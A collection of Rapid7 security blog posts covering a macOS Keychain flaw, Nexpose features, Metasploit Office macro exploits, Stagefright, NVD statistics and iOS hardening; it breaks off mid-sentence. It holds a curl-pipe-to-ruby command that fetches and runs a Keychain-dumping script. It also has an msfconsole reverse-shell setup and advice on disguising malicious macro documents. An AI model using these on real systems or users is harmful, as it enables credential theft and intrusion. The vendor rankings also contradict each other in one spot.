Rapid7 Blog


macOS Keychain Security: What You Need to Know


If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you've likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the "keychain" without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability. Let's pull back a bit to provide sufficient background on why you should be concerned.

What is the macOS Keychain?

Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It's been around a while (back when capital letters ruled the day in "Mac OS") and can hold virtually anything. It's used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely. A more "TL;DR" version of that is: "The macOS Keychain likely has the passwords to all your email, social media, banking, and other websites, as well as for local network shares and your WiFi."

Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. Here's a sample dialog containing credentials for a fake application called (unimaginatively enough) "forexample". The password is not displayed by default: you need to tick the "Show password:" box, and a prompt will appear. Enter your system password and you'll see the password. That's a central part of the Keychain: you provide authority for accessing Keychain elements, even to the application that maintains the secrets for you. Apple has also provided command-line access to work with the keychain via the security command.
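That same security CLI makes the Keychain scriptable. As a minimal sketch (not from the original post), here is a small Python helper that builds the security invocation; the -w flag asks for the secret itself, which triggers the same user-authorization prompt on macOS:

```python
def find_generic_password_cmd(service, reveal=False):
    """Build the argv list for `security find-generic-password`.

    With reveal=True the -w flag is appended, which makes the tool
    print only the stored secret (and triggers the authorization
    prompt when run on macOS).
    """
    cmd = ["security", "find-generic-password", "-s", service]
    if reveal:
        cmd.append("-w")
    return cmd

# On a Mac you would hand this to subprocess.run(), e.g.:
#   import subprocess
#   subprocess.run(find_generic_password_cmd("forexample", reveal=True))
print(" ".join(find_generic_password_cmd("forexample", reveal=True)))
```

The wrapper only constructs the command line, so it can be tested anywhere; the actual Keychain lookup naturally only works on macOS.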
Here's what the listing looks like for this example:

$ security find-generic-password -s forexample
keychain: "/Users/me/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="forexample"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="superseekrit"
    "cdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "crtr"<uint32>=<NULL>
    "cusi"<sint32>=<NULL>
    "desc"<blob>=<NULL>
    "gena"<blob>=<NULL>
    "icmt"<blob>=<NULL>
    "invi"<sint32>=<NULL>
    "mdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "nega"<sint32>=<NULL>
    "prot"<blob>=<NULL>
    "scrp"<sint32>=<NULL>
    "svce"<blob>="forexample"
    "type"<uint32>=<NULL>

Again, the secret data is not visible. As you may have surmised, Apple also provides programmatic access to the Keychain; iOS, tvOS, and Apple's other platforms all use a similar keychain for storing secrets. Before we jump into the news from September 25th, 2017, let's fire up Apple's Time Machine and go back about four years…

A (Very) Brief History of Keyjacking

Rapid7's own Erran Carey put together a proof-of-concept for "keyjacking" your Keychain a little over four years ago. If you run:

curl -L https://raw.github.com/erran/keyjacker/master/keyjacker.rb | ruby

you'll get prompted to unlock the keychain, which will enable the Ruby script to decrypt all the secrets. There's another, older related vulnerability that involved using a bit of AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no longer exists).

So, What's Different Now?

Patrick's video shows him running an unsigned application that was downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea, and when you enable execution a dialog comes up with a button. The user in the video (presumably Patrick) presses said button, some time passes, and then a file with a full, cleartext export of the entire Keychain is scrolled through.
As indicated, many bad things had to happen before the secrets were revealed:

1. The Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system.
2. You had to download a program from some site, or load/run it from a USB (et al.) drive.
3. You had to say "OK" one more time to Apple's warning that what you are about to do is a bad idea.

Sure, registered/signed apps could perform the same malicious function, but that's less likely, since Apple can tie a signed app to the developer (or developer's system) that created it.

What Can I Do?

It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable. Since you're likely running El Capitan or Sierra, upgrading to High Sierra isn't going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don't let this vulnerability alone prevent you from upgrading to High Sierra if you're on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on!

macOS "power users" will not like the following advice, but you should consider performing a fresh install of High Sierra, starting from a completely clean system, then migrating signed applications and data over. It's the next bit that really hurts, though: don't install any unsigned third-party apps, or any apps via MacPorts or Homebrew, until Apple patches the vulnerability. Why? Well, there's a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade).
And Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in before this week's official release. Using any unsigned third-party code could put your secrets at risk. You should also be wary of running signed code that you download outside the Mac App Store. Apple's gatekeeping is not perfect, but it's better than the total absence of gatekeeping that comes with downloads from uncontrolled websites. Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple's first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue. Keep watching the Rapid7 blog for updates!

Banner photo by Travis Wise • Used with permission (CC BY 2.0)

Cisco Enable / Privileged Exec Support


In Nexpose version 6.4.28, we are adding support for privilege elevation on Cisco devices, through the enable command, for those that are running SSH version 2. A fully privileged policy scan provides more accurate information on the target's compliance status, and the ability to elevate through the enable password, while keeping the actual user privilege low, adds an additional layer of security for your devices. This allows our users to run fully privileged policy scans on Cisco IOS without having to pre-configure the target with a user that has full privilege. Instead, they can enter the enable password in the credential window, similar to how sudo elevation is set up. Simply navigate to the credential configuration page for SSH services, select Cisco Enable / privileged exec as your elevation type, and enter your enable password as the elevation password, per the screenshot below:
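Conceptually, the elevation mirrors what an administrator would type at the device's console: authenticate as a low-privilege user, then escalate with enable before running privileged commands. A hypothetical session (hostname and commands are illustrative):

```
switch> enable
Password: **********
switch# show running-config
```

Nexpose performs the equivalent exchange automatically during the scan, using the elevation password you supplied in the credential configuration.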

Introducing Interactive Guides


Recently, Rapid7 took a step forward to deliver insight to our customers: our vulnerability management solutions now include the ability to deliver interactive guides. Guides are step-by-step workflows, built to deliver assistance to users at the right time. Guides are concise and may be absorbed with just a few clicks. They are available anytime on-demand within the user interface, so you can quickly and easily find the information you need, as you need it, where you will be applying it. Here's an example:

How Guides Work

Interactive guides are powered by Pendo.io. As you navigate through the user interface, relevant guides are made available based on the area of the application in use. Pendo serves Rapid7-authored content directly to the user. The user's workstation must be connected to the internet to make use of these new capabilities. We understand this limits access for some of Rapid7's customers, but for most individuals, internet access has become as important as the keyboard or a monitor. To be clear: to receive guides, the user's workstation requires internet access. The machine hosting the Security Console does not require access to the internet.

How are guides delivered in context?

In order to determine which guides are relevant to a user in the moment, very specific information is transmitted to Pendo from the user's browser:

- The URL navigated to
- The CSS element the user has clicked on
- A globally unique, random identifier for the user

With this information, Rapid7 is able to deliver very specific guidance to users when they need it, for improved experiences within the product. All data collected is anonymized, and all communications between the user's workstation and Pendo.io are encrypted with SSL/TLS.
Is my Nexpose data transmitted?

No data that is collected by Rapid7 Nexpose about your organization's assets or vulnerabilities is transmitted to Pendo or Rapid7:

- No personally identifiable information, such as email addresses, names, or user IDs, is transmitted.
- No vulnerability data is transmitted.
- No asset data is transmitted, inclusive of software, attributes, IP addresses, and other metadata.
- No information collected by Scan Engines or Agents is transmitted.

To learn more on how Rapid7 and Pendo.io protect your information, please visit: http://rapid7.com/trust and http://www.pendo.io/support/trust/

I don't see any guides. When will they be available?

We're busy building guides right now. You can expect to see new guides in the coming weeks.

What if I cannot participate, or do not want to participate?

If your users have no access to the internet, then you won't be able to receive guides. No data will be transmitted and no guides will be delivered. If you do not wish to receive guides, you can easily disable the capability on the Security Console:

1. Log in to the machine hosting the Security Console as an administrator.
2. Locate and edit nsc.xml. The file is located in the "deploy/nsc/conf" directory; for example, "/opt/rapid7/deploy/nsc/conf/nsc.xml" in some Linux distributions. Make a copy of the file in case you need to revert the configuration.
3. Edit or add the following element: <Analytics enabled="false" />. This element should be a direct child of <NexposeSecurityConsole />.

This is a snippet of the nsc.xml file used to illustrate the format of the element; your nsc.xml will differ. Changes will take effect during the next Console restart. Making inadvertent changes to the nsc.xml file can cause issues in your Security Console. Please contact Rapid7 Support for guidance or assistance.
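As an illustrative sketch of where that element sits (the surrounding attributes and elements of a real nsc.xml are elided here):

```xml
<NexposeSecurityConsole>
  <!-- ... existing configuration elements ... -->
  <Analytics enabled="false" />
</NexposeSecurityConsole>
```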

Attacking Microsoft Office - OpenOffice with Metasploit Macro Exploits


It is fair to say that Microsoft Office and OpenOffice are some of the most popular applications in the world. We use them for writing papers, making slides for presentations, analyzing sales or financial data, and more. This software is so important to businesses that, even in developing countries, workers who are proficient in an Office suite can make a decent living based on this skill alone. Unfortunately, high popularity for software also means more high-value targets in the eyes of an attacker, and malware-infested Office macros are like an irritating rash that doesn't go away for IT professionals. A macro is a feature that allows users to create automated processes inside a document used by software like Microsoft Word, Excel, or PowerPoint. It is used to enhance the user experience, increase productivity, or automate otherwise manual tasks. In other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session! Macro attacks are nothing new or unusual. A typical attack usually involves embedding malicious macro code in an Office document, sending it to the victim, and asking him or her very nicely to enable that code. The saddest part isn't how lame the attack is, since you are basically begging the victim to run your malware; it's that people have been falling for this trick for decades! The impact of such attacks should not be underestimated. In fact, malicious macros are often used in ransomware and other high-profile breaches. For example, the Cerber ransomware was a macro attack against Office 365 that put millions of users at risk. Since Office 365 is extremely popular in businesses, we expect it to be one of malicious macros' favorite targets for quite some time. Yup, I think people call that social engineering, and apparently it always works. I figured: "OK, why not, a shell is a shell. Let me write some exploits for these"…
and that's how Metasploit's macro exploits were born.

The Microsoft Office Macro Exploit

This Microsoft Office macro exploit is specifically written for the Word document format. It has been tested against these environments:

- Microsoft Office 2010 for Windows
- Microsoft Office 2013 for Windows
- Microsoft Office 2016 for Windows
- Microsoft Office Word for Mac OS X 2011

The following demonstrates how to create a macro exploit for Microsoft Office for OS X, set up a handler, and obtain a session. If you have a valid certificate to sign the malicious macro, you can apply it by using Microsoft Office to sign the macro. With a valid cert there will be no "Enable Content" prompt; Microsoft Office will just execute your code by default. However, this is obviously only ideal for internal use. Good certificates are expensive.

The OpenOffice Macro Exploit

The Apache OpenOffice macro exploit is specifically written for OpenOffice Writer (odt). It has been tested against these environments:

- Windows with PowerShell support (which should be the case since Windows 7)
- Ubuntu Linux (which ships LibreOffice by default)
- OS X

Unlike Microsoft, OpenOffice does not want to open any documents with macros, which means that in order to attack, the victim has to manually do the following in advance:

1. Choose Tools -> Options -> Security
2. Click the Macro Security button
3. Change the security level to either medium or low

If the security level is set to medium, a prompt is presented to the user to either allow or disallow the macro. If set to low, the macro will run without warning. Now let's talk about how to use the exploit. The design for it is actually different than the Microsoft one: not only will it create the malicious document file, the module will also spawn a web server and a payload handler. The purpose of the web server is that when the victim runs the macro, the malicious code will download the final payload from our web server and execute it.
The following demonstrates how to use the exploit:

Exploit Customization

Although the Metasploit macro exploits work right out of the box, some cosmetic customizations are probably necessary to make the document look more legit and believable. To do this, you will need a copy of either Microsoft Office or OpenOffice (depending on the type of exploit you're using), and then:

1. Generate the exploit.
2. Move the exploit to a platform with Office that can edit the document.
3. Open the document with Office and do your editing there. When you're done, simply click save. As long as you're not modifying the macro, it should still work.

Time to Play!

Congratulations, young grasshopper! If you've read this far and have not fallen asleep, then you are ready to start your journey of sweet Office macro pwnage. But before you leave: if you have never used Metasploit - a cyber weapon forged in the fires of, um... Austin, Texas - then you shall download it here. If you already possess such power, then we strongly recommend you run msfupdate. Go now, embrace your destiny of pwnage, and let that glory be yours with Metasploit Office macro exploits.
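For reference, a rough msfconsole session for the Word variant might look like the following. The module path reflects how these exploits shipped in Metasploit around the time of this post; the payload and option values are illustrative, so verify them with the module's `show options` before use:

```
msf > use exploit/multi/fileformat/office_word_macro
msf exploit(office_word_macro) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(office_word_macro) > set LHOST 192.168.1.10
msf exploit(office_word_macro) > exploit

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
msf exploit(handler) > run
```

The generated document is written to Metasploit's local data directory; deliver it to the target, and the handler catches the session when the macro runs.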

Pokemon Go, Security, and Obsolescence


Pokemon Go started it. The crusty old house cell phone, which we had years ago ported from a genuine AT&T land line to a T-Mobile account, suddenly caught the attention of my middle son. "Hey Dad, can I use that phone to catch Pokemon at the park?" "Sure! Have fun, and don't come back until sundown!" A few minutes later, he had hunted down his first Pikachu, which apparently required running around the block in Texas summer heat a few times. Sweat-soaked but proud, he happily presented his prize. I could get used to this! The kids were getting out of the house, exploring the neighborhood, having fun, and I was getting a little peace and quiet. Then one day, Pokemon Go stopped working, stating that it did not support 'rooted' phones.

First, some back story. Our 'house phone' role is generally filled by the most-working last-gen reject device that is too old to be useful as a daily driver, but too new to throw away. In this case, it was a Google Nexus 4. I have always preferred the Google phones over other third parties for a number of reasons: they're cheap if you get the last generation (and sometimes the current), and they usually lead the pack when it comes to software updates and hackability. However, given the industry's appetite for quick turnarounds and obsolescence cycles (and in spite of Google's generally good support), this phone is end-of-life, and has not received an official firmware update in over a year. In fact, this phone is the amalgamation of two Nexus 4s, combined into a Frankenstein assemblage of the most-working screen, battery, and charging ports of the original pair. Since it has been a year and a half since Google released a firmware for this phone, I had it running the next-best thing: CyanogenMod 13, which backported Android 6 to this hardware. Now, this junker phone is as up-to-date as the Android Open Source Project (AOSP) allows. But there was now a show-stopper: you can't run Pokemon Go on rooted phones using CyanogenMod.
Technically, there is a new set of hacks, but this is a cat-and-mouse game, and there comes a time in your life when you just want things to work. And they were already hooked. Why did Niantic decide to impose this restriction after several months of unrestricted access? It comes down to cheaters. People were rooting their phones specifically to fake GPS coordinates to get rare Pokemon, hatch eggs, etc. Since having root access is also required to install non-stock firmware, in this guilty-until-proven-innocent model, we basically get to choose between two possibilities: get up-to-date software but sacrifice the ability to run some applications, or run increasingly out-of-date 'official' software, for the sake of satisfying a DRM or anti-cheating scheme. In the end, I decided that the stock firmware still allowed upgrading a lot of the key components via Google's Play Store, the real core on which an increasing amount of the software in the Android ecosystem relies. Sure, I'm not getting the latest advances in encrypted filesystems, kernel hardening, or process isolation in the latest versions of Android, but it's a tradeoff. Maybe the phone will have died completely by the time the next exploitable bug in libstagefright rears its head. But maybe it already has. It took over a year for enough of the moving parts to come together within Metasploit for a reliable exploit for CVE-2015-3864, one of the 'StageFright' series of vulnerabilities. The exploit needed new payloads, new techniques, and a number of independent research projects to become useful outside of the proof-of-concept realm. In the end, it works very well, even better than the Metaphor exploit from earlier this year, and can be easily targeted to any vulnerable Nexus phone. Ironically, the very openness of the Google Nexus ecosystem made porting the exploit to those firmware builds particularly easy.
In contrast, Samsung firmware, which contains many proprietary additions to the base Android system and is not open source, is harder to target simply because it is harder to examine. In spite of this, it was still possible to target Samsung phones as well. Effectively, with enough effort, any firmware is exploitable; it is just a question of time. When you think of exploits in the StageFright family, think of the vector: someone sends a special text message and takes over a phone without anyone even reading it. You get an email, and without opening it, code is already executed on your device. It's a simple concept, but the fix is not nearly as straightforward. Automatic parsing of metadata in media files is a commonly researched and targeted vulnerability in many different products. Adobe Flash had nasty vulnerabilities in its MP3 metadata parsing code earlier this year. Apple iOS has been vulnerable a number of times to similar attacks. Just last month, similar vulnerabilities were found in Android's libutils library, which could be attacked in a similar way. The exploit that we included in Metasploit for CVE-2015-3864 only targets one vector (web browser) and one file type (MP4 video files). However, there are many other vectors and file types in the same family that could also be exploited, discovered around the same time as CVE-2015-3864. Not only that, but more vectors and file types have been found, and quietly patched, since the original round of StageFright-branded vulnerabilities was hot in the news. Of course, none of these patches have made it into the official firmware for my Nexus 4. I even had to do a double-take in researching this article, since Wikipedia claimed Android 5.1.1 was last updated 2 months ago, while I knew the phone hadn't gotten an over-the-air update in some time. To really know if you're up to date, you have to look at the build number: my Nexus 4 is on LMY48T, while the latest is LMY49M.
It's unlikely that the average consumer with a phone running Android '5.1.1' would be able to tell the difference between a vulnerable and an up-to-date build number, much less the average business with a bring-your-own-device policy. The quick road to obsolete devices in the Android ecosystem at best forces users to choose between security and the functionality they want, like Pokemon Go. The theoretical exploit chains being patched this year can easily turn into next year's reliable Metasploit module. Maybe it's time to bring back the land line.

Using the National Vulnerability Database to Reveal Vulnerability Trends Over Time


This is a guest post by Ismail Guneydas. Ismail Guneydas is a senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-crime investigations, and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty member at Texas A&M. He holds an M.S. in computer science and an MBA.

2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them. For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal. Why the National Vulnerability Database (NVD)? To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, and impact metrics, amongst other data fields. By poring over the NVD data from the last 5 years, we're looking to answer the following questions:

- What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific?
- What are the severities of vulnerabilities? Do we have more critical vulnerabilities, or fewer?
- Which vendors create the most vulnerable products?
- Which products are most vulnerable? Which OS: Windows, OS X, a Linux distro? Which mobile OS: iOS, Android, Windows? Which web browser: Safari, Internet Explorer, Firefox?

Vulnerabilities Per Year

That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to the number in 2014. However, if you look at the overall growth trend of the last 5 years, the 2015 number seems consistent with the overall growth rate. The abnormality here was the 53% increase in 2014. If we compare 2015's numbers with 2013's, we see a 24% increase.
All in all, though, this doesn't mean we didn't have an especially bad year, as we did in 2014 (the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting: there were more critical vulnerabilities in 2015 than in 2014. In 2014 we had more vulnerabilities with CVSS 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS 7, 8, 9, and 10! As you see above, there were 3,376 critical vulnerabilities in 2015, whereas there were only 2,887 critical vulnerabilities in 2014 (that is a 17% increase). In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective (fewer false positives and negatives), up to date with recent vulnerabilities, and faster, with shorter scan times.

Severity of Vulnerabilities

This chart shows the distribution of 2015 vulnerabilities by CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical. There are many vulnerabilities with CVSS 9 and 10. The following graph gives a clearer picture: 36% of the vulnerabilities were critical (CVSS >= 7). The average CVSS is 6.8, right at the boundary of being critical. The severity of vulns is increasing, but this isn't to say it's all bad. In fact, it exposes a crucial point: you have to be deploying a vulnerability management program that separates the wheat from the chaff. An effective vulnerability management program will help you find, and then remediate, vulnerabilities in your environment.

Vulnerability Numbers Per Vendor

Let's analyze the National Vulnerability Database numbers by checking vendors' vulnerabilities. The shifting tide in vulnerabilities doesn't stop for any company, including Apple.
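The arithmetic behind those claims is easy to reproduce. As a quick sketch (the counts are the ones cited above; the >= 7.0 cutoff for "critical" follows the high-severity convention used in this post):

```python
def severity_bucket(cvss):
    """Bucket a CVSS base score the way the post does: >= 7.0 is critical."""
    if cvss >= 7.0:
        return "critical"
    if cvss >= 4.0:
        return "medium"
    return "low"

# Critical-vulnerability counts cited in the post
critical_2014 = 2887
critical_2015 = 3376

increase_pct = (critical_2015 - critical_2014) / critical_2014 * 100
print(f"critical vulns grew {increase_pct:.0f}% year over year")  # ~17%
print(severity_bucket(6.8))  # the 2015 average score lands just below critical
```

Swapping in the full NVD per-score counts for any year gives the same style of severity breakdown shown in the charts.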
The fact is, there are always vulnerabilities; the key has to be detecting them before they are exploited. Apple had the highest number of vulnerabilities in 2015. Of course, with many iOS and OS X vulnerabilities out there in general, it's no surprise this number went up. Here is the full list: Apple jumped from being number 5 in 2014. Microsoft was number 3 and Cisco was number 4. Surprisingly, Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novell, as they were not in the top 10 list last year (they were 13th and 15th). So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to make sure you've prioritized those assets accordingly. Here's a comparison chart that shows the number of vulnerabilities per vendor for 2014 and 2015.

Vulnerabilities Per OS

In 2015, according to the NVD, OS X had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux. Here, the most vulnerable Linux distro is Ubuntu; openSUSE is the runner-up, and then Debian Linux. Interestingly, Windows 7, the most popular desktop OS based on usage, is reported to be less vulnerable than Ubuntu. (That may surprise a few people!)

Vulnerabilities Per Mobile OS

iPhone OS had the highest number of vulnerabilities published in 2015. Windows and Android came after iPhone. 2014 was no different: iPhone OS had the highest number of vulnerabilities, and Windows RT and Android followed it.

Vulnerabilities Per Application

Vulnerabilities Per Browser

IE had the highest number of vulnerabilities in 2015. In 2014, the order of products with the highest number of vulnerabilities was exactly the same (IE, Chrome, Firefox, Safari).

Summary

Given the trends over the past few years reported via the NVD, we should expect more vulnerabilities with higher CVSS scores to be published this year.
Moreover, I predict that mobile OS will be a hot area for security: as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in mobile OS vulnerabilities as well. It's all about priorities. We only have so many hours in the day, and so many resources available to us, to remediate what we can. But if you take intel from something like the NVD and layer it over the visibility you have into your own environment, you can use this information to help build a good to-do list driven by priorities, not fear.

Reduced Annoyances and Increased Security on iOS 9: A Win-Win!


Introduction

Early this year, I posted an article on iOS hardening that used animated GIFs to explain most of the recommended settings. Since then, iOS 9 was released, bringing along many new features, including better support for two-factor authentication: iMessage and FaceTime now work without the need for app-specific passwords, and your trusted devices now automatically become trusted when you authenticate using them. As many people will be getting new iOS devices this holiday season, I decided to write about some simple but very effective settings you can configure on iOS to improve security significantly and reduce annoyances. This guide is meant for personal devices, but most of the recommendations here should apply to the enterprise as well. However, some of the settings require making a device "supervised", which is typically not done on devices owned by employees. First, let's describe some annoyances, and the features that resolve them while improving security. Then, we'll go over how to deploy these settings to iOS devices. Some of these will be even more valuable to those of you who travel often and end up having to use Wi-Fi, as well as leaving iOS devices in less-than-ideal locations without keeping physical control over them.

Warning: Two of these settings will require you to set your device up as a supervised device. These are the settings that prevent a device from being paired to iTunes and from trusting new enterprise application certificates. This means that you should only perform this change on devices that you own, but it also means that you will need to wipe your device in the process, and that restoring a prior-to-supervision backup to a supervised device actually undoes the process. This is why I am posting this around the holidays, as it is an ideal guide for new devices, when you can benefit from a clean setup.
Ex: Restoring from iTunes or iCloud after supervising a device will simply restore it to its prior state, without the configuration profile. No matter what, make sure you have good backups, but understand that you may lose data. The settings that are not marked as "supervised only" can easily be used on existing devices. Annoyances and Security Issues Problem 1 - Ability to Trust Other Computers Your iOS device prompts you to trust each computer you connect it to. Then, if you mistakenly trust another computer, you'll need to reset all your network settings to remove that trust relationship. While it's great that it doesn't trust computers by default, wouldn't it be nicer if it just did not ask? Why would anyone want to trust another computer from their iOS device? Benefits No more annoying prompts, no chance of trusting a computer by mistake, and even if your iPad were stolen unlocked from your hands, the thief would not be able to back it up to iTunes for further analysis. For an excellent explanation of why this setting is valuable, see this article by an iOS forensics expert. This article, as well as some other research he has performed, is a big reason why I've decided that this setting made sense for me, and why I believe more people should be using it. Note that the screenshots in his detailed explanation are not, at the moment, up to date for iOS 9 and the latest Apple Configurator. Warnings As mentioned above, this setting requires your device to be supervised, which means it will need to be wiped. Additionally, you will not be able to use iTunes, and even importing photos on other computers will be impossible. This, in itself, is a great feature, but consider how you use your device. If you use iCloud Photos and iCloud Backups, you probably very rarely use your device over USB for anything but charging, and if you use iTunes Backups, it will be possible to back your device up via the Apple Configurator later. 
Problem 2 - Ability to Allow Untrusted Certificates You're at the airport, or in a hotel. You hop on Wi-Fi, and before you can even accept the captive portal's terms (so your VPN session can be established), you receive a bunch of SSL/TLS warnings about untrusted certificates being used for your email, a page that was already open in Safari, or any other type of encrypted connectivity. If you've ever received so many of those that you accidentally accepted one, realized one of your email accounts had tried to authenticate using that certificate, and proceeded to rapidly change that account's password in a state of semi-panic, this setting is absolutely for you. Benefits Your iOS device will now simply refuse to establish a connection when the certificate is untrusted. This will reduce the number of pop-ups from background processes such as email sync, but will also prevent the accidental acceptance of such a prompt, which could lead to leaked data and credentials. Warnings If you often use your iOS device to connect to services that are protected by self-signed SSL certificates, you will be unable to do so after enabling this feature, unless you first install the appropriate certificate on your device. You can use the Apple Configurator to push any Root CA you need, as well as individual certificates. You will also lose the ability to connect to websites that, for some weird reason, decided to use self-signed certificates, which is not only rare but probably a bad idea to begin with. Problem 3 - Redundant Prompts for Password Management You use a password manager such as 1Password. You never want to be prompted again to use iCloud Keychain, or to save a password for a specific site in Safari (NO, NOT NOW, NOT EVER!!). Benefits While this is not necessarily a direct security improvement, as iCloud Keychain has some interesting security capabilities, it is one in the sense that it will prevent duplication of databases containing your passwords. 
To me though, it's more about not being interrupted when logging into a website, or being asked to configure a feature I will never use. Warnings Autofill will be disabled for other fields as well. This is less of a problem if the password manager you use also allows you to manage identities and other non-password information. Problem 4 - Backup Options are not Enforced You've decided how you want to handle backups on iOS. The options you have are:

- iCloud Backup: Easy, automated, and probably the best way to avoid accidentally losing data, but it backs up your data in a way that defeats some security features, such as end-to-end encryption on iMessage. If this is a big deal to you, remember that the people you communicate with over iMessage probably use iCloud Backup.
- iTunes Backups: Less automated and requires a computer, but keeps your data local. If using iTunes backups, ensure that encryption is enforced, so that anyone with access to your computer cannot simply restore the backup. Encrypted backups also let you restore more items from the keychain, meaning you will not have to log in to as many apps after restoring. You can't use this if you enable the features that mitigate problem 1.
- Apple Configurator Backup: Not automated at all; you must perform backups manually. These backups can be encrypted like iTunes backups, and can be performed from the Configurator host even if you prevent iTunes pairing as shown in problem 1.
- No backups: Rely on apps that sync data to other local systems or cloud services. (Pro tip: you always need backups, especially when you thought you didn't. I lost many Crossy Road characters thinking I didn't need to back up one device so frequently.)

Benefits Once you've decided what your backup strategy is, it's important to enforce your choice as much as possible to avoid things such as accidental cleartext backups in iTunes, or accidental iCloud backups. 
Problem 5 - Enterprise Certificates are Allowed to be Trusted By default, your iOS device could prompt you to install an application signed by an enterprise. This is typically used to deploy corporate applications, but could also be used to distribute malware, as shown by Palo Alto Networks with YiSpecter recently. With iOS 9, Apple made the process safer, but someone with physical control of your device could definitely perform these steps by hand, and on a device used by multiple people, someone could be tricked into trusting an enterprise certificate. Benefits Your device will not accept new enterprise certificates or applications signed with them. Warnings If you actually need to install enterprise apps, you'll want to avoid this setting. This setting also requires a supervised device, meaning you will need to wipe your device to enable it. Personally, I have some iOS devices on which I know I will never install an enterprise app, so I turn this on, and feel smug about how I will not accidentally trust one in the future. Problem 6 - Web Browsing Defaults are Less than Ideal Ad tracking, pop-ups, and other types of often distasteful ads make your browsing experience slower, less private, and less secure. Benefits We will ensure that iOS and Safari are configured to reject third-party cookies, force limited ad tracking, and block pop-ups. Obviously, this is not a replacement for running a good Content Blocker, but it is a nice baseline to have. Warnings Some websites could break due to those settings, specifically regarding cookie handling. Two options will be provided in the guide: one more secure, one slightly less so but more compatible. Let's do it! Install Apple Configurator 2 From the Mac App Store, install Apple Configurator 2. Prior versions will not work with iOS 9. Make sure no devices are connected via USB and start the Configurator. 
Connect via USB After ensuring you have good, working backups (better safe than sorry), if you plan to wipe the device and make it supervised, sign out of iCloud to disable Activation Lock temporarily. Connect your device to the computer running Apple Configurator 2 over USB. Ensure that you are under the All Devices tab. You will see your device appear. If a Lock icon appears, unlock the device. Prepare the device Select your device by clicking on it in the Apple Configurator, then click Prepare. Supervise If you want to be able to pair-lock this device to just this computer, as well as to restrict enterprise applications, you need to supervise the device. Remember that this will require wiping the device. If this is how you want to proceed, select Supervise Devices, and ensure Allow devices to pair with other computers is not selected. Finish Preparing Finish preparing the device by selecting: Configuration: Manual Server: Do not enroll in MDM (if you are performing these steps on a corporate device, you know what to do) Organization: Create a new organization. The names you enter will appear in the configuration screens but do not have to be real; a name alone will suffice. Supervision Identity: If prompted, create a supervision identity. If you already had one, it means you have previously configured supervised devices from this computer. If you are not prompted, either you are not supervising the device, or an identity is being created automatically because you didn't have one before. The identity, in reality, consists of certificates used between the iOS device and the Mac to authenticate the USB connection. Make sure those are backed up, since a lost supervision identity could mean having to wipe the device to modify the profile in the future. Setup Assistant: Show All Steps. You can customize this, but for personal purposes, it's not very useful. The Configurator will start preparing the device. 
If you see such a prompt, remember that clicking Restore will wipe the device. In this case, the test device I am using already had data on it, was managed, etc. Then, the Configurator will download the latest version of iOS, install it, and prepare the device, which should take from A Long Time to Forever. If your device had Activation Lock left enabled, you might receive this prompt. In this case, activate the device manually, then start over. Done Preparing Once the process is complete, your device should show up under the Supervised or Unsupervised tab, depending on what you chose. It is now ready to be configured. Create a Profile In Apple Configurator, hit File, then New Profile. Name your profile, and decide whether you want to give it an identifier, description, and more. These fields are display-only, except for the identifier, which will be used in the future to identify the profile and ask whether you want to overwrite it if you ever modify it. The Security and Automatically Remove Profile fields are interesting. If your device is supervised, it can't be paired to iTunes. You can choose to make the profile removable Always (dangerous, especially if you expected to prevent an adversary from being able to perform an iTunes backup!), With Authorization (a passcode that it will prompt you for, which I would recommend not storing on or with the device), or, the most secure but most restrictive option, Never. As for Automatically Remove Profile, for personal usage, I can't think of any reason not to set it to Never. Go to Restrictions and click Configure. For Problem 1, go to Restrictions, Functionality and ensure Allow Pairing with non-Configurator hosts (supervised only) is unchecked. For Problem 2, still in Functionality, ensure that 